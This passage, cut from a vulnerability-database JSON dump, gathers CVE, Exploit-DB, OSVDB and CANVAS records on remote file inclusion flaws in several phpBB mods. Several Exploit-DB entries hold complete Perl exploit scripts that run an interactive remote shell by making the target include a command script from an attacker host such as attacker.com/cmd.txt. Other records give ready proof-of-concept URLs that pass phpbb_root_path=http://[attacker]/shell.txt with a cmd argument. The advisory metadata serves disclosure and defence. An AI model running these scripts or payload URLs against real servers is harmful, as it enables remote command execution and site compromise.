via a URL in the phpbb_root_path parameter.", "modified": "2017-10-18T21:29:34", "published": "2006-10-18T15:07:00", "id": "CVE-2006-5390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5390", "title": "CVE-2006-5390", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T16:29:05", "bulletinFamily": "exploit", "description": "phpBB Import Tools Mod <= 0.1.4 Remote File Include Vulnerability. CVE-2006-7147. Webapps exploit for php platform", "modified": "2006-10-12T00:00:00", "published": "2006-10-12T00:00:00", "id": "EDB-ID:2531", "href": "https://www.exploit-db.com/exploits/2531/", "type": "exploitdb", "title": "phpBB Import Tools Mod <= 0.1.4 - Remote File Include Vulnerability", "sourceData": "#\n# *\n# * Title: phpBB Import Tools Mod <= 0.1.4 (phpbb_root_path) Remote File Inclusion\n# * Author/Discovery: boecke\n# * Vulnerability Type: Remote File Inclusion\n# * Risk: High Risk\n# * Software Affected: phpBB Import Tools Mod <= 0.1.4\n# *\n# * Literally shouts to: str0ke and henrik\n# * Don't promote Google-ism!\n# *\n#\n\n[ Vulnerable Code: ]\ninclude_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);\ninclude_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);\ninclude_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);\n\n[ Fix: ]\nCorrectly sanitize these variables before their use or deny direct access to the script.\n\n[ Proof of Concept: ]\nhttp://localhost/phpBB2/includes/functions_mod_user.php?phpbb_root_path=\n\n# milw0rm.com [2006-10-12]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2531/"}, {"lastseen": "2016-01-31T16:27:40", "bulletinFamily": "exploit", "description": "phpBB Journals System Mod 1.0.2 [RC2] Remote File Include Exploit. CVE-2006-5306. 
Webapps exploit for php platform", "modified": "2006-10-12T00:00:00", "published": "2006-10-12T00:00:00", "id": "EDB-ID:2522", "href": "https://www.exploit-db.com/exploits/2522/", "type": "exploitdb", "title": "phpBB Journals System Mod 1.0.2 RC2 - Remote File Include Exploit", "sourceData": "#!/usr/bin/perl\n \n################################################################################\n# #\n# Journals System ( Independant Journals System for phpBB ) #\n# #\n# Class: Remote File Include Vulnerability #\n# #\n# Patch: unavailable #\n# #\n# Date: 2006/10/12 #\n# #\n# Remote: Yes #\n# #\n# Type: high #\n# #\n# Site: http://projects.nbishop.name/phpbb/files/journals_system_1.0.2.zip #\n# #\n################################################################################\n\n\nuse IO::Socket;\nuse LWP::Simple;\n\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\n\nprint \"\\n\";\nprint \"######################################################################\\n\";\nprint \"# #\\n\";\nprint \"# Journals System <= 1.0.2 [RC2] Remote File Include Vulnerability #\\n\";\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\nprint \"# Email: Nima Salehi nima[at]ashiyane.ir #\\n\";\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\nprint \"# #\\n\";\nprint \"######################################################################\\n\";\n\n\nif (@ARGV < 2)\n{\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\n print \"\\n EX : Ashiyane.pl www.victim.com /phpbb/ \\n\\n\";\nexit;\n}\n\n\n$host=$ARGV[0];\n$path=$ARGV[1];\n\n#$vul=includes/journals_delete.php?phpbb_root_path=\"\n#$vul=includes/journals_post.php?phpbb_root_path=\"\n$vul=\"includes/journals_edit.php?phpbb_root_path=\"\n\nprint \"Type Your Commands ( uname -a )\\n\";\nprint \"For Exiit Type END\\n\";\n\nprint \"<Shell> \";$cmd = <STDIN>;\n\nwhile($cmd !~ \"END\") {\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not 
connect to host.\\n\\n\";\n\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\n print $socket \"Host: \".$host.\"\\r\\n\";\n print $socket \"Accept: */*\\r\\n\";\n print $socket \"Connection: close\\r\\n\\n\";\n\n while ($raspuns = <$socket>)\n {\n print $raspuns;\n }\n\n print \"<Shell> \";\n $cmd = <STDIN>;\n}\n\n# milw0rm.com [2006-10-12]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2522/"}, {"lastseen": "2016-01-31T16:28:09", "bulletinFamily": "exploit", "description": "phpBB Insert User Mod <= 0.1.2 Remote File Include Exploit. CVE-2006-7100. Webapps exploit for php platform", "modified": "2006-10-12T00:00:00", "published": "2006-10-12T00:00:00", "id": "EDB-ID:2525", "href": "https://www.exploit-db.com/exploits/2525/", "type": "exploitdb", "title": "phpBB Insert User Mod <= 0.1.2 - Remote File Include Exploit", "sourceData": "#!/usr/bin/perl\n \n################################################################################\n# #\n# PHPBB insert user 0.1.2 #\n# #\n# Class: Remote File Include Vulnerability #\n# #\n# Patch: unavailable #\n# #\n# Date: 2006/10/12 #\n# #\n# Remote: Yes #\n# #\n# Type: high #\n# #\n# Site: http://www.grahameames.co.uk/phpbb/downloads/insert_user_0.1.2.zip #\n# #\n################################################################################\n\n\nuse IO::Socket;\nuse LWP::Simple;\n\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\n\nprint \"\\n\";\nprint \"######################################################################\\n\";\nprint \"# #\\n\";\nprint \"# PHPBB insert user <= 0.1.2 Remote File Include Vulnerability #\\n\";\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\nprint \"# Email: Behrooz Kamalian Kamalian[at]ashiyane.ir #\\n\";\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\nprint \"# #\\n\";\nprint 
\"######################################################################\\n\";\n\n\nif (@ARGV < 2)\n{\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\n print \"\\n EX : Ashiyane.pl www.victim.com /phpbb/ \\n\\n\";\nexit;\n}\n\n\n$host=$ARGV[0];\n$path=$ARGV[1];\n$vul=\"includes/functions_mod_user.php?phpbb_root_path=\"\n\nprint \"Type Your Commands ( uname -a )\\n\";\nprint \"For Exiit Type END\\n\";\n\nprint \"<Shell> \";$cmd = <STDIN>;\n\nwhile($cmd !~ \"END\") {\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\n\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\n print $socket \"Host: \".$host.\"\\r\\n\";\n print $socket \"Accept: */*\\r\\n\";\n print $socket \"Connection: close\\r\\n\\n\";\n\n while ($raspuns = <$socket>)\n {\n print $raspuns;\n }\n\n print \"<Shell> \";\n $cmd = <STDIN>;\n}\n\n# milw0rm.com [2006-10-12]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2525/"}, {"lastseen": "2016-01-31T16:29:25", "bulletinFamily": "exploit", "description": "phpBB SpamBlocker Mod <= 1.0.2 Remote File Include Exploit. CVE-2006-5301. 
Webapps exploit for php platform", "modified": "2006-10-12T00:00:00", "published": "2006-10-12T00:00:00", "id": "EDB-ID:2533", "href": "https://www.exploit-db.com/exploits/2533/", "type": "exploitdb", "title": "phpBB SpamBlocker Mod <= 1.0.2 - Remote File Include Exploit", "sourceData": "#!/usr/bin/perl\n \n################################################################################\n# #\n# SpamBlockerMod package for phpBB #\n# #\n# Class: Remote File Include Vulnerability #\n# #\n# Patch: unavailable #\n# #\n# Date: 2006/10/12 #\n# #\n# Remote: Yes #\n# #\n# Type: high #\n# #\n# Site: http://leo.vak.ru/devel/spamblocker/spamblockermodv1.0.2.zip #\n# #\n################################################################################\n\n\nuse IO::Socket;\nuse LWP::Simple;\n\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\n\nprint \"\\n\";\nprint \"######################################################################\\n\";\nprint \"# #\\n\";\nprint \"# SpamBlockerMODv <= 1.0.2 Remote File Include Vulnerability #\\n\";\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\nprint \"# Email: nima salehi nima[at]ashiyane.ir #\\n\";\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\nprint \"# #\\n\";\nprint \"######################################################################\\n\";\n\n\nif (@ARGV < 2)\n{\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\n print \"\\n EX : Ashiyane.pl www.victim.com /phpbb/ \\n\\n\";\nexit;\n}\n\n\n$host=$ARGV[0];\n$path=$ARGV[1];\n$vul=\"root/includes/antispam.php?phpbb_root_path=\"\n\nprint \"Type Your Commands ( uname -a )\\n\";\nprint \"For Exiit Type END\\n\";\n\nprint \"<Shell> \";$cmd = <STDIN>;\n\nwhile($cmd !~ \"END\") {\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\n\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? 
HTTP/1.1\\r\\n\";\n print $socket \"Host: \".$host.\"\\r\\n\";\n print $socket \"Accept: */*\\r\\n\";\n print $socket \"Connection: close\\r\\n\\n\";\n\n while ($raspuns = <$socket>)\n {\n print $raspuns;\n }\n\n print \"<Shell> \";\n $cmd = <STDIN>;\n}\n\n# milw0rm.com [2006-10-12]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2533/"}, {"lastseen": "2016-01-31T14:48:16", "bulletinFamily": "exploit", "description": "Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit. CVE-2006-2245. Webapps exploit for php platform", "modified": "2006-05-04T00:00:00", "published": "2006-05-04T00:00:00", "id": "EDB-ID:1747", "href": "https://www.exploit-db.com/exploits/1747/", "type": "exploitdb", "title": "Auction <= 1.3m phpbb_root_path Remote File Include Exploit", "sourceData": "#!/usr/bin/perl\n##\n#phpBB auction mod - Remote File Inclusion Vuln\n# Bug discovered by VietMafia\n# code copier: webDEViL w3bd3vil[at]gmail.com\n#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit\n# dork: intext:\"phpbb - auction\" inurl:\"auction\"\n# usage:\n# perl wb1.pl <target> <cmd shell location> <cmd shell variable>\n# perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd\n# cmd shell example: <?system($cmd);?>\n# cmd shell variable: ($_GET[cmd]);\n\nuse LWP::UserAgent;\n\n$Path = $ARGV[0];\n$Pathtocmd = $ARGV[1];\n$cmdv = $ARGV[2];\n\nif($Path!~/http:\\/\\// || $Pathtocmd!~/http:\\/\\// || !$cmdv){usage()}\n\nhead();\n\nwhile()\n{\n print \"[shell] \\$\";\nwhile(<STDIN>)\n {\n $cmd=$_;\n chomp($cmd);\n\n$xpl = LWP::UserAgent->new() or die;\n$req = HTTP::Request->new(GET =>$Path.'/auction/auction_common.php?phpbb_root_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die \"\\nCould Not connect\\n\"; \n\n\n$res = $xpl->request($req);\n$return = $res->content;\n$return =~ tr/[\\n]/[\u00ea]/;\n\nif (!$cmd) {print \"\\nPlease Enter a Command\\n\\n\"; $return 
=\"\";}\n\nelsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)\n {print \"\\nCould Not Connect to cmd Host or Invalid Command Variable\\n\";exit}\nelsif ($return =~/^<br.\\/>.<b>Fatal.error/) {print \"\\nInvalid Command or No Return\\n\\n\"}\n\nif($return =~ /(.*)/)\n\n{\n $finreturn = $1;\n $finreturn=~ tr/[\u00ea]/[\\n]/;\n print \"\\r\\n$finreturn\\n\\r\";\n last;\n}\n\nelse {print \"[shell] \\$\";}}}last;\n\nsub head()\n {\n print \"\\n============================================================================\\r\\n\";\n print \" phpBB auction mod - Remote File Inclusion Vuln\\r\\n\";\n print \"============================================================================\\r\\n\";\n }\nsub usage()\n {\n head();\n print \" Usage: perl wb1.pl <target> <cmd shell location> <cmd shell variable>\\r\\n\\n\";\n print \" <Site> - Full path to phpBB auction ex: http://www.site.com/ or http://www.site.com/phpbb/ \\r\\n\";\n print \" <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \\r\\n\";\n print \" <cmd variable> - Command variable used in php shell \\r\\n\";\n print \"============================================================================\\r\\n\";\n print \" webDEViL w3bd3vil[at]gmail.com \\r\\n\";\n print \"============================================================================\\r\\n\";\n exit();\n }\n\n# milw0rm.com [2006-05-04]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1747/"}, {"lastseen": "2016-01-31T16:31:40", "bulletinFamily": "exploit", "description": "phpBB SearchIndexer Mod (archive_topic.php) Remote File Include Exploit. CVE-2006-5418. 
Webapps exploit for php platform", "modified": "2006-10-13T00:00:00", "published": "2006-10-13T00:00:00", "id": "EDB-ID:2549", "href": "https://www.exploit-db.com/exploits/2549/", "type": "exploitdb", "title": "phpBB SearchIndexer Mod archive_topic.php Remote File Include Exploit", "sourceData": "#!/usr/bin/perl\n \n#####################################################################################################\n# #\n# pbpbb archive for search engines #\n# #\n# Class: Remote File Include Vulnerability #\n# #\n# Patch: unavailable #\n# #\n# Date: 2006/10/12 #\n# #\n# Remote: Yes #\n# #\n# Type: high #\n# #\n# Site: http://mambopower.net/ http://www.mambopower.net/downloads/phpbb_searchindexer.zip #\n# #\n#####################################################################################################\n\n\nuse IO::Socket;\nuse LWP::Simple;\n\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\n\nprint \"\\n\";\nprint \"##########################################################################\\n\";\nprint \"# #\\n\";\nprint \"# pbpbb archive for search engines Remote File Include Vulnerability #\\n\";\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\nprint \"# Email: nima salehi nima[at]ashiyane.ir #\\n\";\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\nprint \"# #\\n\";\nprint \"##########################################################################\\n\";\n\n\nif (@ARGV < 2)\n{\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\n print \"\\n EX : Ashiyane.pl www.victim.com /path/ \\n\\n\";\nexit;\n}\n\n\n$host=$ARGV[0];\n$path=$ARGV[1];\n$vul=\"includes/archive/archive_topic.php?phpbb_root_path=\"\n\nprint \"Type Your Commands ( uname -a )\\n\";\nprint \"For Exiit Type END\\n\";\n\nprint \"<Shell> \";$cmd = <STDIN>;\n\nwhile($cmd !~ \"END\") {\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\n\n print $socket \"GET 
\".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\n print $socket \"Host: \".$host.\"\\r\\n\";\n print $socket \"Accept: */*\\r\\n\";\n print $socket \"Connection: close\\r\\n\\n\";\n\n while ($raspuns = <$socket>)\n {\n print $raspuns;\n }\n\n print \"<Shell> \";\n $cmd = <STDIN>;\n}\n\n# milw0rm.com [2006-10-13]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2549/"}, {"lastseen": "2016-01-31T20:54:53", "bulletinFamily": "exploit", "description": "phpBB Plus <= 1.53 (phpbb_root_path) Remote File Inclusion Vuln. CVE-2007-5009. Webapps exploit for php platform", "modified": "2007-09-20T00:00:00", "published": "2007-09-20T00:00:00", "id": "EDB-ID:4434", "href": "https://www.exploit-db.com/exploits/4434/", "type": "exploitdb", "title": "phpBB Plus <= 1.53 phpbb_root_path Remote File Inclusion Vuln", "sourceData": "AUTHOR = Mehrad Ansari Targhi\nE-Mail : mehrad1989@gmail.com\nMy Yahoo Messenger ID : mehrad_1989\n\nScript Download URL : http://www.phpbbplus.net/PhpBBPlus1.53.zip\n\nThis Is A RFI Bug .\nThis Bug Is In : [ PHPBBPLUS INSTALLED ]/language/lang_german/lang\n_main_album.php\n\nExploit : http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_path=[ http://shell.txt]?a=\n\n# milw0rm.com [2007-09-20]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4434/"}, {"lastseen": "2016-01-31T16:31:55", "bulletinFamily": "exploit", "description": "phpBB ACP User Registration Mod 1.0 File Inclusion Vulnerability. CVE-2006-5390. 
Webapps exploit for php platform", "modified": "2006-10-13T00:00:00", "published": "2006-10-13T00:00:00", "id": "EDB-ID:2551", "href": "https://www.exploit-db.com/exploits/2551/", "type": "exploitdb", "title": "phpBB ACP User Registration Mod 1.0 File Inclusion Vulnerability", "sourceData": " ..%%%%....%%%%...%%..%%...........%%%%...%%%%%...%%%%%%..%%...%%.\n .%%......%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%...%%.\n ..%%%%...%%..%%..%%%%%%..%%%%%%..%%......%%%%%...%%%%....%%.%.%%.\n .....%%..%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%%%%%%.\n ..%%%%....%%%%...%%..%%...........%%%%...%%..%%..%%%%%%...%%.%%..\n .................................................................\n \n phpBB ACP User Registration (MMW) Mod 1.00 File Inclusion Vulnerability\n\n\nDate: 2006/10/13\nTime: 18:20:57 => GMT+1:00\n\nFounder: bd0rk || SOH-Crew\nWebsite: www.soh-crew.it.tt\nGreetz: str0ke, Perle, Tr4ileR, nukedx\n\nDownload: http://www.phpbb.com/phpBB/catdb.php?mode=download&id=1988012\n\nCode: include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);\ninclude_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);\ninclude_once($phpbb_root_path . 'includes/bbcode.' . 
$phpEx);\n\n[+]Exploit: http://[target]/[directory]/includes/functions_mod_user.php?phpbb_root_path=http://Sh3llScript?\n\n# milw0rm.com [2006-10-13]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2551/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1017058\n[Secunia Advisory ID:22387](https://secuniaresearch.flexerasoftware.com/advisories/22387/)\n[Related OSVDB ID: 29713](https://vulners.com/osvdb/OSVDB:29713)\n[Related OSVDB ID: 29714](https://vulners.com/osvdb/OSVDB:29714)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0181.html\nISS X-Force ID: 29491\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2522\nFrSIRT Advisory: ADV-2006-4029\n[CVE-2006-5306](https://vulners.com/cve/CVE-2006-5306)\nBugtraq ID: 20484\n", "modified": "2006-10-12T10:18:46", "published": "2006-10-12T10:18:46", "href": "https://vulners.com/osvdb/OSVDB:29712", "id": "OSVDB:29712", "title": "Journals System includes/journals_delete.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1017058\n[Secunia Advisory ID:22387](https://secuniaresearch.flexerasoftware.com/advisories/22387/)\n[Related OSVDB ID: 29712](https://vulners.com/osvdb/OSVDB:29712)\n[Related OSVDB ID: 29714](https://vulners.com/osvdb/OSVDB:29714)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0181.html\nISS X-Force ID: 29491\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2522\nFrSIRT Advisory: ADV-2006-4029\n[CVE-2006-5306](https://vulners.com/cve/CVE-2006-5306)\nBugtraq 
ID: 20484\n", "modified": "2006-10-12T10:18:46", "published": "2006-10-12T10:18:46", "href": "https://vulners.com/osvdb/OSVDB:29713", "id": "OSVDB:29713", "title": "Journals System includes/journals_post.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1017058\n[Secunia Advisory ID:22387](https://secuniaresearch.flexerasoftware.com/advisories/22387/)\n[Related OSVDB ID: 29713](https://vulners.com/osvdb/OSVDB:29713)\n[Related OSVDB ID: 29712](https://vulners.com/osvdb/OSVDB:29712)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0181.html\nISS X-Force ID: 29491\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2522\nFrSIRT Advisory: ADV-2006-4029\n[CVE-2006-5306](https://vulners.com/cve/CVE-2006-5306)\nBugtraq ID: 20484\n", "modified": "2006-10-12T10:18:46", "published": "2006-10-12T10:18:46", "href": "https://vulners.com/osvdb/OSVDB:29714", "id": "OSVDB:29714", "title": "Journals System includes/journals_edit.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 29512\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2531\n[CVE-2006-7147](https://vulners.com/cve/CVE-2006-7147)\nBugtraq ID: 20525\n", "modified": "2006-10-12T03:11:09", "published": "2006-10-12T03:11:09", "href": "https://vulners.com/osvdb/OSVDB:35450", "id": "OSVDB:35450", "title": "phpBB Import Tools includes/functions_mod_user.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path]/functions_mod_user.php?phpbb_root_path=http://[attacker]/shell.txt?&cmd=ls\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0187.html\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2525\n[CVE-2006-7100](https://vulners.com/cve/CVE-2006-7100)\nBugtraq ID: 20493\n", "modified": "2006-10-12T20:19:44", "published": "2006-10-12T20:19:44", "href": "https://vulners.com/osvdb/OSVDB:35449", "id": "OSVDB:35449", "title": "phpBB Insert User includes/functions_mod_user.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:22356](https://secuniaresearch.flexerasoftware.com/advisories/22356/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0198.html\nISS X-Force ID: 29506\nGeneric Exploit URL: http://milw0rm.com/exploits/2533\nFrSIRT Advisory: ADV-2006-4028\n[CVE-2006-5301](https://vulners.com/cve/CVE-2006-5301)\nBugtraq ID: 20501\n", "modified": "2006-10-12T09:48:48", "published": "2006-10-12T09:48:48", "href": "https://vulners.com/osvdb/OSVDB:29711", "id": "OSVDB:29711", "title": "SpamBlockerMod for phpBB includes/antispam.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:22", "bulletinFamily": "software", "description": "## Vulnerability Description\nphpbb-auction contains a flaw that may allow a remote attacker to execute arbitrary commands. 
The issue is due to auction_common.php not properly sanitizing user input supplied to the 'phpbb_root_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nphpbb-auction contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to auction_common.php not properly sanitizing user input supplied to the 'phpbb_root_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/auction/auction_common.php?phpbb_root_path=http://[attacker]\n## References:\nVendor URL: http://www.phpbb-auction.com/\n[Secunia Advisory ID:19944](https://secuniaresearch.flexerasoftware.com/advisories/19944/)\nOther Advisory URL: http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n[Nessus Plugin ID:21323](https://vulners.com/search?query=pluginID:21323)\nISS X-Force ID: 26192\nFrSIRT Advisory: ADV-2006-1641\n[CVE-2006-2245](https://vulners.com/cve/CVE-2006-2245)\nBugtraq ID: 17822\n", "modified": "2006-05-03T08:17:35", "published": "2006-05-03T08:17:35", "href": "https://vulners.com/osvdb/OSVDB:25263", "id": "OSVDB:25263", "title": "phpBB phpbb-Auction auction_common.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "description": "# No description provided by 
the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0205.html\nISS X-Force ID: 29573\n[CVE-2006-7090](https://vulners.com/cve/CVE-2006-7090)\nBugtraq ID: 20518\n", "modified": "2006-10-12T00:00:00", "published": "2006-10-12T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:31029", "id": "OSVDB:31029", "title": "phpBB Security phpbb_security.php phpbb_root_path Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/language/lang_english/lang_admin_album.php?phpbb_root_path=[RFI]?a=\n## References:\nVendor Specific News/Changelog Entry: http://www.phpbb2.de/ftopic45218.html\n[Secunia Advisory ID:26888](https://secuniaresearch.flexerasoftware.com/advisories/26888/)\n[Related OSVDB ID: 38723](https://vulners.com/osvdb/OSVDB:38723)\n[Related OSVDB ID: 38724](https://vulners.com/osvdb/OSVDB:38724)\nFrSIRT Advisory: ADV-2007-3247\n[CVE-2007-5100](https://vulners.com/cve/CVE-2007-5100)\nBugtraq ID: 25776\n", "modified": "2007-09-22T00:00:00", "published": "2007-09-22T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:38725", "id": "OSVDB:38725", "title": "phpBB Plus language/lang_english/lang_admin_album.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/language/lang_german/lang_admin_album.php?phpbb_root_path=[RFI]?a=\n## References:\nVendor Specific News/Changelog Entry: http://www.phpbb2.de/ftopic45218.html\n[Secunia Advisory ID:26888](https://secuniaresearch.flexerasoftware.com/advisories/26888/)\n[Related OSVDB ID: 38725](https://vulners.com/osvdb/OSVDB:38725)\n[Related OSVDB 
ID: 38724](https://vulners.com/osvdb/OSVDB:38724)\nFrSIRT Advisory: ADV-2007-3247\n[CVE-2007-5100](https://vulners.com/cve/CVE-2007-5100)\nBugtraq ID: 25776\n", "modified": "2007-09-22T00:00:00", "published": "2007-09-22T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:38723", "id": "OSVDB:38723", "title": "phpBB Plus language/lang_german/lang_admin_album.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2016-09-25T14:13:54", "bulletinFamily": "exploit", "description": "**Name**| phpbbplus_include \n---|--- \n**CVE**| CVE-2007-5009 \n**Exploit Pack**| [CANVAS](<http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| phpBBplus Remote file inclusion \n**Notes**| CVSS: 6.8 \nRepeatability: Infinite \nVENDOR: phpbbplus.net \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5009 \nCVE Name: CVE-2007-5009 \n\n", "modified": 